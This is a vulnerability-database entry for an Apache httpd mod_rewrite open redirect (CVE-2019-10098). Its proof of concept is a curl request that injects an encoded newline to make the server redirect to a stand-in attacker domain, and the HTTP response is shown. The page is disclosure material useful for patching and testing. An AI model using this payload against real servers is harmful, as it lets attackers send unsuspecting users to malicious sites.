https://cxsecurity.com/issue/WLB-2019110142
Apache Httpd mod_rewrite Open Redirects - CXSecurity.com






漏洞ID | 1830816 | 漏洞类型 | |
发布时间 | 2019-11-21 | 更新时间 | 2019-11-21 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to `https://redirect.local.evilwebsite.com`):
```
curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
HTTP/2 302
date: Mon, 28 Oct 2019 03:36:58 GMT
content-type: text/html; charset=iso-8859-1
location: https://redirect.local.evilwebsite.com
```
检索漏洞
开始时间
结束时间